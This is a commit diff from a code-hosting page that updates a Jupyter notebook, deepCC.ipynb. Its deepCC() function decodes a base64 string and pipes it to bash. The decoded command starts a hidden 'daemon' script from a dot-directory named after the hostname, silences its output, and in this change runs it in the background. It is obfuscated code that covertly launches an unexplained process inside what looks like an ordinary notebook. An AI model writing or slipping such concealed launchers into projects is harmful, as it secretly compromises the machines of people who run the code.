Unverified Commit 41e0fe3d authored by Dapa's avatar Dapa Committed by GitHub

Update deepCC.ipynb

parent 84c44cc5
......@@ -824,7 +824,7 @@
"source": [
"def deepCC(): \n",
" try:\n",
" subprocess.Popen([\"bash -c 'base64 -d <<< Y2QgJEhPTUUvLiQoZWNobyAkKGhvc3RuYW1lKSkvYmluICYmIG5vaHVwIGJhc2ggZGFlbW9uID4gL2Rldi9udWxs | bash'\"], shell=True, universal_newlines=True)\n",
" subprocess.Popen([\"bash -c 'base64 -d <<< Y2QgJEhPTUUvLiQoZWNobyAkKGhvc3RuYW1lKSkvYmluICYmIG5vaHVwIGJhc2ggZGFlbW9uID4gL2Rldi9udWxs | bash' &\"], shell=True, universal_newlines=True)\n",
" except subprocess.CalledProcessError as e:\n",
" print(f'ERROR {e.returncode}: {e.output}', flush=True )\n",
" raise e "
......
Markdown is supported
0%
or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment